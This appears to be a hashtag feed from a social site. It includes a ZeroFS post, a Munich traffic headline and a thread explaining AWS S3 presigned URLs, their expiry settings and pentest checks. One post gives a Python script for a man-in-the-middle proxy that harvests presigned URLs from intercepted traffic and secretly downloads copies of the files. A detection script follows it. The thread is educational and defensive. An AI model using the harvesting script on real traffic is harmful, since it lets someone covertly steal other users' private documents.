
I don't know if anybody noticed #ZeroFS yet, but it seems there is a completely user-space implementation of #NFS and #blockstorage on top of #S3 #objectstorage: github.com/Barre/zerofs

Including a demo running #ZFS on top of it which essentially allows geo-redundant ZFS volumes: asciinema.org/a/728234 & github.com/Barre/zerofs?tab=re

I don't see a #FreeBSD port yet, but if this really works it would be absolutely awesome.

GitHub - Barre/ZeroFS: ZeroFS - The Filesystem That Makes S3 your Primary Storage

"No replacement concept": mega chaos brewing on a popular rail line outside Munich

Lamborghinis, Porsches and BMWs inch along bumper to bumper on the Bundesstraße 318 …
#Muenchen #Munchen #Munich #Deutschland #Deutsch #DE #Schlagzeilen #Headlines #Nachrichten #News #Europe #Europa #EU #München #Bahn #BayerischeRegionalbahn #Bayern #brb #Chaos #Deisenhofen #Feiern #Germany #Giesing #Holzkirchen #S3 #Seefeste #Sperrung #Tegernsee #TegernseerTal
europesays.com/de/245514/

Continued thread

If you made some kind of intercepting HTTP/HTTPS proxy (thinking of a #pentester use case here), you could make it search for these URLs in the streams of HTTP and HTML that are passing through the proxy. Copy down the full URLs and asynchronously issue your own requests for the same URLs and store your own copy of the resulting files. The end user still gets their copy and nobody can tell it's happening. You'd almost certainly be able to do this because the links would surely be valid at the time the proxy sees them, and would work if the proxy immediately issued its request for its own copy.
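Here's a rough sketch of the harvesting side in Python, assuming your proxy hands you each response body as text (the hook wiring, storage naming, and threading model are all just illustrative, not any particular proxy's API):

```python
import hashlib
import re
import threading

import requests  # third-party; any HTTP client works for the re-fetch

# SigV4 presigned URLs carry their authorization in the query string,
# so X-Amz-Signature= is a convenient marker to search for.
PRESIGNED_RE = re.compile(r'https://[^\s"\'<>]+[?&]X-Amz-Signature=[0-9a-f]+[^\s"\'<>]*')

def on_response_body(body_text: str) -> None:
    """Call this from the proxy's response hook (hook name is hypothetical)."""
    for url in set(PRESIGNED_RE.findall(body_text)):
        # Fetch asynchronously so the original user's traffic is never delayed.
        threading.Thread(target=_grab, args=(url,), daemon=True).start()

def _grab(url: str) -> None:
    resp = requests.get(url, timeout=30)
    if resp.ok:
        name = hashlib.sha256(url.encode()).hexdigest()[:16]
        with open(f"copy_{name}.bin", "wb") as fh:
            fh.write(resp.content)
```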

The only way to really detect this happening is for the bucket owner to look at the S3 object logs in CloudTrail and see more than 1 fetch of that URL. Of course, someone with network connectivity issues could issue the request more than once. But a systematic pattern of duplicate fetches would indicate hijinks. The end user can't detect this happening to them. But, of course, you're MitM'ing their internet connection, so that could be detected.
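On the bucket-owner side, a minimal sketch of hunting for duplicate fetches, assuming you've downloaded the CloudTrail S3 data events as the usual gzipped JSON log files. Note this counts fetches per object key, which is a coarser signal than per presigned URL:

```python
import gzip
import json
import sys
from collections import Counter
from pathlib import Path

def count_get_object(log_dir: str) -> Counter:
    """Count GetObject data events per (bucket, key) across CloudTrail log files."""
    hits = Counter()
    for path in Path(log_dir).rglob("*.json.gz"):
        with gzip.open(path, "rt") as fh:
            for record in json.load(fh).get("Records", []):
                if record.get("eventName") != "GetObject":
                    continue
                params = record.get("requestParameters") or {}
                hits[(params.get("bucketName"), params.get("key"))] += 1
    return hits

if __name__ == "__main__":
    for (bucket, key), n in count_get_object(sys.argv[1]).most_common():
        if n > 1:  # repeated fetches of the same object are worth a closer look
            print(f"{n}x  s3://{bucket}/{key}")
```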

#AWS #S3 #security #pentest
4/end

Continued thread

If you know how these things work, I haven't told you anything new or useful yet. Maybe I won't. But the thing I think is important and frequently overlooked is that expiration time. Too short (5 seconds) and your user might not click the link before it expires. Too long (86400 seconds, i.e., one day) and this file is available far longer than you intended.

So looking at the X-Amz-Expires query parameter on #AWS #S3 presigned URLs is a good #security check, especially if you're doing a #pentest. Those URLs can be passed from device to device (e.g., you can Slack one to a colleague or SMS it to a friend and it will still work). So you want to counsel anyone who uses them to tune the expiration as short as is reasonably practical. That expiration is all of the security control on that link.

[edit: I left out something important]
I see these URLs with 86400 as the expiration time a lot. If you're a developer, look at what you're setting them to. If you're a #pentester, this is a thing to warn your customer about.
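A quick way to audit this, sketched in Python for SigV4 query-string-signed URLs (the example URL and the 600-second threshold are just placeholders):

```python
from urllib.parse import urlparse, parse_qs

def presigned_expiry_seconds(url: str):
    """Return the X-Amz-Expires value of a presigned URL, or None if absent."""
    params = parse_qs(urlparse(url).query)
    values = params.get("X-Amz-Expires")
    return int(values[0]) if values else None

url = ("https://example-bucket.s3.amazonaws.com/report.pdf"
       "?X-Amz-Date=20240101T000000Z&X-Amz-Expires=86400&X-Amz-Signature=deadbeef")
expires = presigned_expiry_seconds(url)
if expires is not None and expires > 600:  # pick a threshold that fits the workflow
    print(f"presigned URL is valid for {expires}s - consider shortening it")
```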

3/

Continued thread

That URL contains everything you need to fetch the object. Whoever has that URL can fetch that object an unlimited number of times until the link expires. Here's a redacted example of a link like this that I got today.

I click a link in an email, which invokes a Lambda function behind an API Gateway. It generates an S3 pre-signed URL on the fly and redirects my browser to it. In theory I'm the only person who can fetch this object because I'm the only person with this link. The link carries its parameters in the query string, and you'll see X-Amz-Date and X-Amz-Expires=600. The link is valid for 600 seconds (10 minutes) after that date. This link works until that time is up.
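For illustration, a minimal sketch of what a Lambda like that might look like behind an API Gateway proxy integration; the bucket name, key lookup, and environment variable are invented here, and a real handler would also authenticate the requester:

```python
import os

import boto3

s3 = boto3.client("s3")
BUCKET = os.environ.get("BUCKET", "example-invoice-bucket")  # hypothetical bucket name

def handler(event, context):
    # Simplified: take the object key straight from the query string.
    key = (event.get("queryStringParameters") or {}).get("doc", "invoice.pdf")
    url = s3.generate_presigned_url(
        "get_object",
        Params={"Bucket": BUCKET, "Key": key},
        ExpiresIn=600,  # produces the X-Amz-Expires=600 seen in the final URL
    )
    # With a proxy integration, API Gateway returns this as an HTTP 302 redirect.
    return {"statusCode": 302, "headers": {"Location": url}}
```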

#AWS #S3
2/

Some info on #AWS #S3 presigned URLs. They're used often when you want to grant temporary, anonymous access to something stored in an S3 bucket via HTTPS. Frequent uses are things like generating a PDF invoice, report, or other document and then sending the user a link where they can download it. You don't want the doc to live forever and you don't want the link to be valid forever.

For your web front end to control access itself, it would have to read from S3 and then stream the file to the user. That costs money in S3 data transfer charges and in bandwidth on your front end. So S3 pre-signed URLs let you give your user a time-limited download that is delivered directly from S3 to them. Your web front end doesn't get involved, which is desirable in a few ways.
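For reference, generating one of these with boto3 looks roughly like this (bucket and key are placeholders; ExpiresIn is the lifetime in seconds):

```python
import boto3

s3 = boto3.client("s3")

url = s3.generate_presigned_url(
    "get_object",
    Params={"Bucket": "example-reports-bucket", "Key": "2024/invoice-0042.pdf"},
    ExpiresIn=600,  # 10 minutes; keep this as short as the workflow allows
)
print(url)  # anyone holding this URL can GET the object until it expires
```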

A couple useful points

🧵1/